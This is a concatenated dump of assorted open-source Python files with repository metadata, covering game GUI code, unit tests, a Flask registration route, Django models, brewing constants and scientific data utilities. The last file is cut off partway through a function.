examples/python/numpy_functions.py | benedicteb/FYS2140-Resources | 0 | 33668 | <filename>examples/python/numpy_functions.py
#!/usr/bin/env python
"""
Created on Mon 2 Dec 2013
Script viser import av funksjoner fra numpy og bruk av noen.
@author <NAME>
"""
from numpy import *
print 'e^1 =', exp( 1 ) # Eksponentialfunksjonen
print 'cos(pi) =', cos( pi ) # Cosinus
print 'sqrt(4) =', sqrt( 4 ) # Kvadratrot
print 'range(5) =', range(5) # Rekke opp til 4
print 'zeros(5) =', zeros(5) # Tom array med 5 elementer
print 'linspace(0,5,5) =', linspace(0,5,5) # Rekke som ikke oeker med 1
"""
bruker @ unix $ python numpy_functions.py
e^1 = 2.71828182846
cos(pi) = -1.0
sqrt(4) = 2.0
range(5) = [0, 1, 2, 3, 4]
zeros(5) = [ 0. 0. 0. 0. 0.]
linspace(0,5,5) = [ 0. 1.25 2.5 3.75 5. ]
"""
| 2.1875 | 2 |
toontown/dmenu/DMenuDisclaimer.py | LittleNed/toontown-stride | 1 | 33796 | from direct.gui.DirectGui import OnscreenText, DirectButton
from panda3d.core import *
from direct.interval.IntervalGlobal import *
from direct.showbase.DirectObject import DirectObject
from toontown.toonbase import ToontownGlobals
class DMenuDisclaimer(DirectObject):
notify = directNotify.newCategory('DisclaimerScreen')
def __init__(self):
DirectObject.__init__(self)
base.setBackgroundColor(0, 0, 0)
disclaimerText = "Project Altis is a not-for-profit fanmade parody made under Fair Use. Project Altis is not affiliated with The Walt Disney Company and/or the Disney Interactive Media Group (collectively referred to as \"Disney\") by clicking I agree you hereby agree that you acknowledge this fact."
self.disclaimer = OnscreenText(text = disclaimerText, font = ToontownGlobals.getMinnieFont(), style = 3, wordwrap = 30, scale = .08, pos = (0, .3, 0))
gui = loader.loadModel('phase_3/models/gui/tt_m_gui_mat_mainGui.bam')
yesUp = gui.find('**/tt_t_gui_mat_okUp')
yesDown = gui.find('**/tt_t_gui_mat_okDown')
noUp = gui.find('**/tt_t_gui_mat_closeUp')
noDown = gui.find('**/tt_t_gui_mat_closeDown')
self.accept = DirectButton(parent = aspect2d, relief = None, image = (yesUp, yesDown, yesUp), image_scale = (0.6, 0.6, 0.6), image1_scale = (0.7, 0.7, 0.7), image2_scale = (0.7, 0.7, 0.7), text = ('', 'I Agree', 'I Agree'), text_pos=(0, -0.175), text_style = 3, text_scale=0.08, pos = (.4, 0, -.5), command = self.accept)
self.deny = DirectButton(parent = aspect2d, relief = None, image = (noUp, noDown, noUp), image_scale = (0.6, 0.6, 0.6), image1_scale = (0.7, 0.7, 0.7), image2_scale = (0.7, 0.7, 0.7), text = ('', 'I Disagree', 'I Disagree'), text_pos=(0, -0.175), text_style = 3, text_scale=0.08, pos = (-.4, 0, -.5), command = self.deny)
def accept(self):
self.disclaimer['text'] = 'Loading...'
self.accept.destroy()
self.deny.destroy()
base.graphicsEngine.renderFrame()
messenger.send("AgreeToGame")
base.cr.hasAccepted = True
self.disclaimer.removeNode()
def deny(self):
base.exitFunc() | 1.320313 | 1 |
pirates/minigame/RepairBarnacle.py | Willy5s/Pirates-Online-Rewritten | 81 | 33924 | <gh_stars>10-100
import random
from pandac.PandaModules import Point3
from direct.gui.DirectGui import DirectFrame, DirectLabel
from direct.fsm import FSM
from direct.interval.IntervalGlobal import *
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
import RepairGlobals
MIN_SCALE = 1.5
MAX_SCALE_ADD = 1.0
MAX_SCRUB_AMT = 20.0
class RepairBarnacle(DirectFrame, FSM.FSM):
barnacleFallSounds = None
def __init__(self, name, barnacleGeom):
self.config = RepairGlobals.Careening
DirectFrame.__init__(self, parent=None, relief=None)
self.barnacleGeom = barnacleGeom
FSM.FSM.__init__(self, 'Barnacle_%sFSM' % name)
self._initAudio()
self._initVars()
self._initGUI()
return
def _initVars(self):
self.heat = 0.0
self.hp = 100
self.maxHP = 100
self.currentShake = None
self.fallingAnim = None
return
def _initAudio(self):
if not self.barnacleFallSounds:
RepairBarnacle.barnacleFallSounds = (
loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE1), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE2), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE3), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE4), loadSfx(SoundGlobals.SFX_MINIGAME_REPAIR_CAREEN_COMPLETE5))
def _initGUI(self):
self.barnacleGeom.reparentTo(self)
self.barnacleGeom.setScale(0.6)
self.barnacleGeom.setR(random.random() * 360)
if self.config.showBarnacleHP:
self.hpLabel = DirectLabel(text='', scale=(0.025, 0.025, 0.025), pos=(0.0, 0.0, -0.01), textMayChange=1, parent=self)
def destroy(self):
if self.currentShake is not None:
self.currentShake.clearToInitial()
self.currentShake = None
del self.currentShake
if self.fallingAnim is not None:
self.fallingAnim.clearToInitial()
self.fallingAnim = None
del self.fallingAnim
self.cleanup()
if self.config.showBarnacleHP:
self.hpLabel.destroy()
del self.hpLabel
DirectFrame.destroy(self)
self.barnacleGeom.removeNode()
del self.barnacleGeom
return
def setMaxHP(self, newMaxHP, globalMaxHP):
self.maxHP = newMaxHP
self.globalMaxHP = globalMaxHP
def setHP(self, newHP):
self.hp = newHP
if self.config.showBarnacleHP:
self.hpLabel['text'] = '%i' % self.hp
self.hpLabel.setText()
if self.hp <= 0.0:
self.hp = 0.0
self.request('Falling')
self.setScale(self.hp * MAX_SCALE_ADD / self.globalMaxHP + MIN_SCALE)
def reduceHP(self, pushDir, powerScale):
amount = pushDir.length()
pushDir.normalize()
self.heat = min(1.0, self.heat + amount)
amount *= 50
if amount > MAX_SCRUB_AMT:
amount = MAX_SCRUB_AMT
amount *= powerScale
newHP = self.hp - amount
self.setHP(newHP)
if self.currentShake is None:
self.currentShake = Sequence(LerpPosInterval(self, duration=0.03, pos=(self.getX() - pushDir[0] * (0.01 + amount / 1000.0), self.getY(), self.getZ() - pushDir[1] * (0.01 + amount / 1000.0)), blendType='easeIn'), LerpPosInterval(self, duration=0.06, pos=(self.getX(), self.getY(), self.getZ()), blendType='easeOut'), LerpPosInterval(self, duration=0.04, pos=(self.getX() + pushDir[0] * (0.0075 + amount / 2000.0), self.getY(), self.getZ() + pushDir[1] * (0.005 + amount / 2000.0)), blendType='easeIn'), LerpPosInterval(self, duration=0.08, pos=(self.getX(), self.getY(), self.getZ()), blendType='easeOut'), Func(self.clearCurrentShake))
self.currentShake.start()
return
def checkCollision(self, mousePosition):
sld = Point3(mousePosition.getX(), 0.0, mousePosition.getY()) - self.getPos(render2d)
return self.getCurrentOrNextState() == 'Idle' and sld.length() < self.config.barnacleRadius * self.getScale().getX()
def clearCurrentShake(self):
self.currentShake = None
return
def enterIdle(self):
visibleIndex = random.uniform(0, self.barnacleGeom.getNumChildren() - 1)
for i in range(self.barnacleGeom.getNumChildren() - 1):
self.barnacleGeom.getChild(i).unstash()
newHP = self.maxHP
self.heat = 0.0
self.setHP(newHP)
self.unstash()
def exitIdle(self):
pass
def enterFalling(self):
if self.currentShake is not None:
self.currentShake.finish()
sound = random.choice(self.barnacleFallSounds)
sound.play()
self.fallingAnim = Sequence(LerpPosInterval(self, duration=2.0, pos=(self.getX(), self.getY(), self.getZ() - 2.0), blendType='easeIn'), Func(self.request, 'Clean'))
self.fallingAnim.start()
return
def exitFalling(self):
self.stash()
def enterClean(self):
pass
def exitClean(self):
pass | 1.664063 | 2 |
Onaeri/timekeeper.py | Lakitna/Onaeri | 0 | 34052 | <reponame>Lakitna/Onaeri<gh_stars>0
import time
import math
from . import settings
class TimeKeeper:
"""
Handles timekeeping in timecodes
"""
def __init__(self, minpertimecode=None,
runtime=0, update=True, latestcode=None):
self._minPerTimeCode = minpertimecode or settings.Global.minPerTimeCode
self.latestCode = latestcode or self.code()
self.update = update
self.runtime = runtime
def tick(self):
"""
Progress the timekeeper and set update flag on timeCode change.
"""
if self.latestCode == self.code():
self.update = False
else:
self.update = True
self.runtime += 1
def code(self, h=None, m=None, s=None, dry=False):
"""
Calculate a new timecode
"""
if h is None and m is None and s is None:
h = time.localtime().tm_hour
m = time.localtime().tm_min
s = time.localtime().tm_sec
if h is None:
h = 0
if m is None:
m = 0
if s is None:
s = 0
if isinstance(h, tuple):
if len(h) > 2:
s = h[2]
if len(h) > 1:
m = h[1]
h = h[0]
ret = math.floor(((h * 60) + m + (s / 60)) / self._minPerTimeCode)
if not dry:
self.latestCode = ret
return ret
def timestamp(self, code=None):
"""
Return the timestring of a timecode
"""
if code is None:
code = self.latestCode
minutes = code * self._minPerTimeCode
h = math.floor(minutes / 60)
m = math.floor(minutes % 60)
s = math.floor((minutes % 1) * 60)
return "%02d:%02d:%02d" % (h, m, s)
| 3.140625 | 3 |
tests/Util/test_config.py | JI511/Personal_Fitness | 0 | 34180 | # ----------------------------------------------------------------------------------------------------------------------
# Body Weight test cases
# ----------------------------------------------------------------------------------------------------------------------
# imports
import unittest
import tempfile
import os
import shutil
import logging
from src.Util.config import Config
from src.Util.constants import Constants
class TestConfig(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.file_path = os.path.join(self.logs_dir, 'test_config.ini')
self.logger = logging.getLogger(__name__)
self.config = Config(logger=self.logger,
output_path=self.logs_dir)
self.section = 'OPTIONS'
self.option = 'water'
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# read_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_read_config_option_nominal(self):
"""
Checks that the default config file is created properly.
"""
value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, "oz")
def test_read_config_option_bad_option(self):
"""
Attempts to get a bad value in the config file.
"""
with self.assertRaises(KeyError) as error:
self.config.read_config_option(section=self.section,
option="bad")
self.assertTrue('bad' in error.exception)
# ------------------------------------------------------------------------------------------------------------------
# update_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_update_config_option_nominal(self):
"""
Updates a config value to be used in the future.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, water_type)
def test_update_config_retain_unique_values(self):
"""
Updating an option should keep unaffected values the same when rewriting.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
value = '5'
status = self.config.update_config_option(section=self.section,
option='backup_rate',
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
backup_rate = self.config.read_config_option(section=self.section,
option='backup_rate')
self.assertEqual(water_type, 'mL')
self.assertEqual(backup_rate, '5')
def test_update_config_option_bad_section(self):
"""
Attempts to change a config option with a section that does not exist.
"""
status = self.config.update_config_option(section='bad',
option=self.option,
value='mL')
self.assertFalse(status)
def test_update_config_option_bad_option(self):
"""
Attempts to change a config option that does not exist.
"""
status = self.config.update_config_option(section=self.section,
option='bad',
value='mL')
self.assertFalse(status)
# ------------------------------------------------------------------------------------------------------------------
# check_config_file_values tests
# ------------------------------------------------------------------------------------------------------------------
def test_check_config_file_values_nominal(self):
"""
A new default has been added to a section. Add the default value to an already existing config file. The old
config values will remain.
"""
Constants.config_defaults[self.section]['test'] = 'new'
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
self.config.check_config_file_values()
added_default = self.config.read_config_option(section=self.section,
option='test')
self.assertEqual(added_default, 'new')
old_value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(old_value, 'mL')
# ------------------------------------------------------------------------------------------------------------------
# create_backup_database tests
# ------------------------------------------------------------------------------------------------------------------
def test_create_backup_database_nominal(self):
"""
Creates a backup database when no other backups are present
"""
pass
def test_create_backup_database_already_exists(self):
"""
Checks for a backup database file, and sees that one has been created within the backup rate.
"""
pass
def test_create_backup_database_needed(self):
"""
Checks for a backup database file, one does exist, but a new one is needed.
"""
pass
def test_create_backup_database_no_backup_db_folder(self):
"""
Creates the backup_db folder within the cwd if it does not already exist.
"""
pass
# ----------------------------------------------------------------------------------------------------------------------
# End
# --------------------------------------------------------------------------------------------------------------------
| 1.664063 | 2 |
predict.py | zahrabashir98/SmileDetection | 17 | 34308 | import sys
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import time
model = load_model("models/model.h5")
def find_faces(image):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_default.xml')
face_rects = face_cascade.detectMultiScale(
image,
scaleFactor = 1.1,
minNeighbors = 22
)
return face_rects
def load_image(filepath):
image = cv2.imread(filepath)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
return image, gray_image
def predict(gray_image):
face_rects = find_faces(gray_image)
for face_rect in face_rects:
x, y, w, h = face_rect
face = gray_image[y:y+h, x:x+w]
face = cv2.resize(face, (48, 48)).reshape((1, 48, 48, 1))
predicted_emotions = model.predict(face)[0]
best_emotion = 'happiness' if predicted_emotions[1] > predicted_emotions[0] else 'neutral'
# Create a json serializable result
yield dict(
border = dict(
x = float(x),
y = float(y),
width = float(w),
height = float(h),
),
prediction = {'happiness': float(predicted_emotions[0]), 'neutral': float(predicted_emotions[1])},
emotion = best_emotion
)
def put_text(image, rect, text):
x, y, w, h = rect
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = h / 30.0
font_thickness = int(round(font_scale * 1.5))
text_size, _ = cv2.getTextSize(text, font, font_scale, font_thickness)
center_text_x = x + (w // 2)
center_text_y = y + (h // 2)
text_w, text_h = text_size
lower_left_text_x = center_text_x - (text_w // 2)
lower_left_text_y = center_text_y + (text_h // 2)
cv2.putText(
image, text,
(lower_left_text_x, lower_left_text_y),
font, font_scale, (0, 255, 0), font_thickness
)
def draw_face_info(image, face_info):
x = int(face_info['border']['x'])
y = int(face_info['border']['y'])
w = int(face_info['border']['width'])
h = int(face_info['border']['height'])
emotion = face_info['emotion']
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)
put_text(image, (x, y, w, h // 5), emotion)
def show_image(image, title='Result'):
plt.subplot(111), plt.imshow(image), plt.title(title)
plt.show()
if __name__ == '__main__':
# start time
start_time = time.time()
image, gray_image = load_image(sys.argv[1])
for face_info in predict(gray_image):
print(face_info)
draw_face_info(image, face_info)
# end time
end_time = time.time()
show_image(image)
response_time = end_time - start_time
print(response_time)
| 2.203125 | 2 |
emenu/conftest.py | Ryszyy/emenu | 0 | 34436 | <gh_stars>0
import pytest
from django.contrib.auth import get_user_model
from emenu.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> get_user_model(): # type: ignore
return UserFactory()
| 0.984375 | 1 |
corehq/apps/callcenter/utils.py | johan--/commcare-hq | 0 | 34564 | from __future__ import absolute_import
from collections import namedtuple
from datetime import datetime, timedelta
import pytz
from casexml.apps.case.dbaccessors import get_open_case_docs_in_domain
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.xml import V2
import uuid
from xml.etree import ElementTree
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.domain.models import Domain
from corehq.apps.es.domains import DomainES
from corehq.apps.es import filters
from corehq.apps.hqcase.utils import submit_case_blocks, get_case_by_domain_hq_user_id
from corehq.feature_previews import CALLCENTER
from corehq.util.quickcache import quickcache
from corehq.util.timezones.conversions import UserTime, ServerTime
from dimagi.utils.couch import CriticalSection
class DomainLite(namedtuple('DomainLite', 'name default_timezone cc_case_type use_fixtures')):
def midnights(self, utcnow=None):
"""Returns a list containing two datetimes in UTC that corresponds to midnight
in the domains timezone on either side of the current UTC datetime.
i.e. [<previous midnight in TZ>, <next midnight in TZ>]
>>> d = DomainLite('', 'Asia/Kolkata', '', True)
>>> d.midnights(datetime(2015, 8, 27, 18, 30, 0 ))
[datetime.datetime(2015, 8, 26, 18, 30), datetime.datetime(2015, 8, 27, 18, 30)]
>>> d.midnights(datetime(2015, 8, 27, 18, 31, 0 ))
[datetime.datetime(2015, 8, 27, 18, 30), datetime.datetime(2015, 8, 28, 18, 30)]
"""
utcnow = utcnow or datetime.utcnow()
tz = pytz.timezone(self.default_timezone)
current_time_tz = ServerTime(utcnow).user_time(tz).done()
midnight_tz1 = current_time_tz.replace(hour=0, minute=0, second=0, microsecond=0)
midnight_tz_utc1 = UserTime(midnight_tz1).server_time().done()
midnight_tz_utc2 = midnight_tz_utc1 + timedelta(days=(1 if midnight_tz_utc1 < utcnow else -1))
return sorted([midnight_tz_utc1, midnight_tz_utc2])
CallCenterCase = namedtuple('CallCenterCase', 'case_id hq_user_id')
def sync_user_case(commcare_user, case_type, owner_id):
"""
Each time a CommCareUser is saved this method gets called and creates or updates
a case associated with the user with the user's details.
This is also called to create user cases when the usercase is used for the
first time.
"""
with CriticalSection(['user_case_%s_for_%s' % (case_type, commcare_user._id)]):
domain = commcare_user.project
def valid_element_name(name):
try:
ElementTree.fromstring('<{}/>'.format(name))
return True
except ElementTree.ParseError:
return False
# remove any keys that aren't valid XML element names
fields = {k: v for k, v in commcare_user.user_data.items() if valid_element_name(k)}
# language or phone_number can be null and will break
# case submission
fields.update({
'name': commcare_user.name or commcare_user.raw_username,
'username': commcare_user.raw_username,
'email': commcare_user.email,
'language': commcare_user.language or '',
'phone_number': commcare_user.phone_number or ''
})
case = get_case_by_domain_hq_user_id(domain.name, commcare_user._id, case_type)
close = commcare_user.to_be_deleted() or not commcare_user.is_active
caseblock = None
if case:
props = dict(case.dynamic_case_properties())
changed = close != case.closed
changed = changed or case.type != case_type
changed = changed or case.name != fields['name']
changed = changed or case.owner_id != owner_id
if not changed:
for field, value in fields.items():
if field != 'name' and props.get(field) != value:
changed = True
break
if changed:
caseblock = CaseBlock(
create=False,
case_id=case._id,
owner_id=owner_id,
case_type=case_type,
close=close,
update=fields
)
else:
fields['hq_user_id'] = commcare_user._id
caseblock = CaseBlock(
create=True,
case_id=uuid.uuid4().hex,
owner_id=owner_id,
user_id=owner_id,
case_type=case_type,
update=fields
)
if caseblock:
casexml = ElementTree.tostring(caseblock.as_xml())
submit_case_blocks(casexml, domain.name)
def sync_call_center_user_case(user):
domain = user.project
if domain and domain.call_center_config.enabled:
owner_id = domain.call_center_config.case_owner_id
if domain.call_center_config.use_user_location_as_owner:
owner_id = user.location_id
sync_user_case(
user,
domain.call_center_config.case_type,
owner_id
)
def sync_usercase(user):
domain = user.project
if domain and domain.usercase_enabled:
sync_user_case(
user,
USERCASE_TYPE,
user.get_id
)
def is_midnight_for_domain(midnight_form_domain, error_margin=15, current_time=None):
current_time = current_time or datetime.utcnow()
diff = current_time - midnight_form_domain
return diff.days >= 0 and diff < timedelta(minutes=error_margin)
def get_call_center_domains():
result = (
DomainES()
.is_active()
.is_snapshot(False)
.filter(filters.term('call_center_config.enabled', True))
.fields(['name', 'default_timezone', 'call_center_config.case_type', 'call_center_config.use_fixtures'])
.run()
)
def to_domain_lite(hit):
return DomainLite(
name=hit['name'],
default_timezone=hit['default_timezone'],
cc_case_type=hit.get('call_center_config.case_type', ''),
use_fixtures=hit.get('call_center_config.use_fixtures', True)
)
return [to_domain_lite(hit) for hit in result.hits]
def get_call_center_cases(domain_name, case_type, user=None):
all_cases = []
if user:
docs = (doc for owner_id in user.get_owner_ids()
for doc in get_open_case_docs_in_domain(domain_name, case_type,
owner_id=owner_id))
else:
docs = get_open_case_docs_in_domain(domain_name, case_type)
for case_doc in docs:
hq_user_id = case_doc.get('hq_user_id', None)
if hq_user_id:
all_cases.append(CallCenterCase(
case_id=case_doc['_id'],
hq_user_id=hq_user_id
))
return all_cases
@quickcache(['domain'])
def get_call_center_case_type_if_enabled(domain):
if CALLCENTER.enabled(domain):
return Domain.get_by_name(domain).call_center_config.case_type
| 1.570313 | 2 |
apps/brew/settings.py | martync/zython | 0 | 34692 | SRM_TO_HEX = {
"0": "#FFFFFF",
"1": "#F3F993",
"2": "#F5F75C",
"3": "#F6F513",
"4": "#EAE615",
"5": "#E0D01B",
"6": "#D5BC26",
"7": "#CDAA37",
"8": "#C1963C",
"9": "#BE8C3A",
"10": "#BE823A",
"11": "#C17A37",
"12": "#BF7138",
"13": "#BC6733",
"14": "#B26033",
"15": "#A85839",
"16": "#985336",
"17": "#8D4C32",
"18": "#7C452D",
"19": "#6B3A1E",
"20": "#5D341A",
"21": "#4E2A0C",
"22": "#4A2727",
"23": "#361F1B",
"24": "#261716",
"25": "#231716",
"26": "#19100F",
"27": "#16100F",
"28": "#120D0C",
"29": "#100B0A",
"30": "#050B0A"
}
WATER_L_PER_GRAIN_KG = 2.5
MAIN_STYLES = {
"1": "LIGHT LAGER",
"2": "PILSNER",
"3": "EUROPEAN AMBER LAGER",
"4": "DARK LAGER",
"5": "BOCK",
"6": "LIGHT HYBRID BEER",
"7": "AMBER HYBRID BEER",
"8": "ENGLISH PALE ALE",
"9": "SCOTTISH AND IRISH ALE",
"10": "AMERICAN ALE",
"11": "ENGLISH BROWN ALE",
"12": "PORTER",
"13": "STOUT",
"14": "INDIA PALE ALE (IPA)",
"15": "GERMAN WHEAT AND RYE BEER",
"16": "BELGIAN AND FRENCH ALE",
"17": "SOUR ALE",
"18": "BELGIAN STRONG ALE",
"19": "STRONG ALE",
"20": "FRUIT BEER",
"21": "SPICE / HERB / VEGETABLE BEER",
"22": "SMOKE-FLAVORED AND WOOD-AGED BEER",
"23": "SPECIALTY BEER",
"24": "TRADITIONAL MEAD",
"25": "MELOMEL (FRUIT MEAD)",
"26": "OTHER MEAD",
"27": "STANDARD CIDER AND PERRY",
"28": "SPECIALTY CIDER AND PERRY"
}
| 0.949219 | 1 |
api/routes/user_router.py | cgiroux86/TeamInterview | 1 | 34820 | from flask import Blueprint, request, jsonify
from api.models.user_model import User, UserPasswords, db
from flask_bcrypt import Bcrypt
user_bp = Blueprint('user_bp', __name__)
def validate_register_fields(req):
data = req.get_json(silent=True)
fields = ['first_name', 'last_name', 'email', 'password']
for f in fields:
if f not in data:
return False
return True
@user_bp.route('/test', methods=['POST'])
def test():
return f'{validate_register_fields(request)}'
@user_bp.route('/register', methods=['POST'])
def register():
if validate_register_fields(request):
data = request.get_json(silent=True)
first_name = data['first_name']
last_name = data['last_name']
email = data['email']
digest = data['password']
user = User(
first_name=first_name,
last_name=last_name,
email=email,
)
try:
db.session.add(user)
db.session.commit()
except Exception as e:
return(str(e))
try:
user_pw = UserPasswords(
user_id=user.id,
digest=digest
)
db.session.add(user_pw)
db.session.commit()
return jsonify(user.serialize()), 201
except Exception as e:
return str(e)
else:
return jsonify(error='missing required fields with a hot reload!'), 400
| 1.632813 | 2 |
webtool/server/models/equipment.py | wodo/WebTool3 | 13 | 34948 | <filename>webtool/server/models/equipment.py
# -*- coding: utf-8 -*-
from django.db import models
from .mixins import SeasonsMixin
from .time_base import TimeMixin
from . import fields
class EquipmentManager(models.Manager):
def get_by_natural_key(self, code):
return self.get(code=code)
class Equipment(SeasonsMixin, TimeMixin, models.Model):
objects = EquipmentManager()
code = models.CharField(
'Kurzzeichen',
unique=True,
max_length=10,
help_text="Kurzzeichen für die Ausrüstung",
)
name = fields.NameField(
'Bezeichnung',
help_text="Bezeichnung der Ausrüstung",
)
description = fields.DescriptionField(
'Beschreibung',
help_text="Beschreibung der Ausrüstung",
)
default = models.BooleanField(
'Die initiale Ausrüstung',
blank=True, default=False
)
def natural_key(self):
return self.code,
natural_key.dependencies = ['server.season']
def __str__(self):
return "{} ({})".format(self.name, self.code)
class Meta:
get_latest_by = "updated"
verbose_name = "Ausrüstung"
verbose_name_plural = "Ausrüstungen"
unique_together = ('code', 'name')
ordering = ('code', ) | 1.375 | 1 |
frameworks/Python/spyne/gen_benchmark_config.py | xsoheilalizadeh/FrameworkBenchmarks | 5,300 | 35076 | <filename>frameworks/Python/spyne/gen_benchmark_config.py
#!/usr/bin/env python
from __future__ import print_function
import json
from spyne import AnyUri, Unicode, ComplexModel, M, UnsignedInteger16, Array
from spyne.protocol.json import JsonDocument
from spyne.util.dictdoc import get_object_as_dict
class BenchmarkConfigElement(ComplexModel):
# exclude this from the output document
key = Unicode(pa={JsonDocument: dict(exc=True)})
display_name = M(Unicode)
notes = Unicode
versus = Unicode
db_url = AnyUri
json_url = AnyUri
query_url = AnyUri
fortune_url = AnyUri
update_url = AnyUri
plaintext_url = AnyUri
port = M(UnsignedInteger16(default=8080))
approach = M(Unicode(values=['Realistic', 'Stripped'], default='Realistic'))
classification = M(Unicode(values=['Micro', 'Fullstack', 'Platform'], default='Micro'))
database = M(Unicode(values=['none', 'mongodb', 'postgres', 'mysql'], default='none'))
orm = M(Unicode(values=['Full', 'Micro', 'None', 'Raw']))
framework = M(Unicode)
language = M(Unicode)
flavor = M(Unicode)
platform = M(Unicode)
webserver = M(Unicode)
os = M(Unicode(default='Linux'))
database_os = M(Unicode(default='Linux'))
class BenchmarkConfig(ComplexModel):
framework = M(Unicode)
tests = Array(BenchmarkConfigElement, wrapped=False)
gen_raw_test = lambda: BenchmarkConfigElement(
display_name="Spyne RAW",
db_url="/dbsraw",
query_url="/dbraw?queries=",
fortune_url="/fortunesraw",
update_url="/raw-updates?queries=",
orm='Raw',
)
gen_normal_test = lambda: BenchmarkConfigElement(
display_name="Spyne ORM",
db_url="/dbs",
query_url="/db?queries=",
fortune_url="/fortunes",
update_url="/updatesraw?queries=",
orm='Full',
)
def add_common(bc):
bc.port = 8080
bc.approach = "Realistic"
bc.classification = "Micro"
bc.database = "postgres"
bc.framework = "spyne"
bc.language = "Python"
bc.platform = "Spyne"
bc.webserver = "None"
bc.os = "Linux"
bc.database_os = "Linux"
bc.versus = "wsgi"
bc.plaintext_url = "/plaintext"
return bc
config = BenchmarkConfig(framework='spyne', tests=[])
keys = iter(['default', 'raw', 'py3orm', 'py3raw'])
for flav in ['CPython', 'Python3']:
bc = add_common(gen_normal_test())
bc.flavor = flav
bc.key = next(keys)
config.tests.append(bc)
bc = add_common(gen_raw_test())
bc.flavor = flav
bc.key = next(keys)
config.tests.append(bc)
data = get_object_as_dict(config, complex_as=dict)
data['tests'] = [{d['key']: d} for d in data['tests']]
data = json.dumps(data, indent=2, sort_keys=True, separators=(',', ': '))
open('benchmark_config.json', 'wb').write(data)
print(data)
| 1.359375 | 1 |
main.py | Forcide/ApacheParser | 0 | 35204 | <reponame>Forcide/ApacheParser
from modules import menu, hosts, logMail, status, webpagina, zoekInLog
def main():
""""
Dit is de start file/functie van het programma, hierin worden alle modules geladen en zo nodig uitgevoerd.
Het menu wordt gestart en de keuze wordt verwezen naar een van de modules.
Geimporteerde modules:
- menu
- hosts
- logMail
- status
- webpagina
- zoekInLog
"""
keuze = menu.menu()
if keuze == 1:
logMail.logMail()
elif keuze == 2:
webpagina.bezochteWebpagina()
elif keuze == 3:
hosts.uniekeHosts()
elif keuze == 4:
status.aantalStatus()
elif keuze == 5:
zoekInLog.zoekInLog()
elif keuze == 6:
exit()
hoofdmenu = menu.menuAfsluiten()
if hoofdmenu == 'J':
main()
elif hoofdmenu == 'N':
exit()
main()
| 1.0625 | 1 |
python/analysis/fp_fit/fp_file.py | ACTCollaboration/moby2 | 3 | 35332 | #!/usr/bin/python
from __future__ import print_function
from __future__ import absolute_import
from past.builtins import basestring
import sys
import numpy as np
import moby2
trace = moby2.util.log.logger.trace
# transitional...
_fp_formats = {
'det_uid': '%4d',
'ok': '%1d',
'x0': '%9.6f',
'x0_err': '%9.6f',
'y0': '%9.6f',
'y0_err': '%9.6f',
'tau': '%8.5f',
'tau_err': '%8.5f',
'h': '%.4e',
'w': '%9.6f',
'sn': '%9.1f',
'base': '%.5e',
'n_obs': '%3d',
}
_fp_fields = ['ok', 'x0', 'x0_err', 'y0', 'y0_err', 'tau', 'tau_err',
'h', 'w', 'sn', 'base', 'n_obs']
_fp_columns_format_str = ' '.join(['{%s:%s}'%(k, _fp_formats[k][1:])
for k in _fp_fields]) + '\n'
class FPFitFile(moby2.detectors._SimpleDetData):
fields = _fp_fields
dtypes = {'ok': bool, 'n_obs': int}
columns_format_str = _fp_columns_format_str
xcfs = '{det_uid:4d} {ok:1d} '\
'{x0:9.6f} {x0_err:9.6f} {y0:9.6f} {y0_err:9.6f} '\
'{tau:8.5f} {tau_err:8.5f} '\
'{h:.4e} {w:9.6f} {sn:9.1f} {n_obs:3d}\n'
header = '# det_uid ok x0 x0_err y0 y0_err '\
'tau tau_err h w sn n_obs'
def __init__(self, det_uid=None):
if det_uid is not None:
self.det_uid = np.array(det_uid, dtype='int64')
n = len(det_uid)
for f in self.fields:
setattr(self, f, np.zeros(n, self.dtypes.get(f, 'float64')))
def __repr__(self):
name = repr(self.__class__)
return '%s with %i det_uid for fields ' % (name, len(self.det_uid)) + \
','.join(self.fields)
def update_row(self, row, data):
for k in self.fields:
if k in data:
getattr(self, k)[row] = data[k]
@classmethod
def from_columns_file(cls, filename):
data = np.loadtxt(filename, unpack=1)
det_uid = data[0].astype('int')
self = cls(det_uid)
self.ok = data[1].astype('int').astype('bool')
if len(data[2:]) == 11:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn, self.base, self.n_obs = data[2:]
elif len(data[2:-1]) == 9:
self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn = data[2:-1]
self.base = 0 * self.w
elif len(data[2:-1]) == 8:
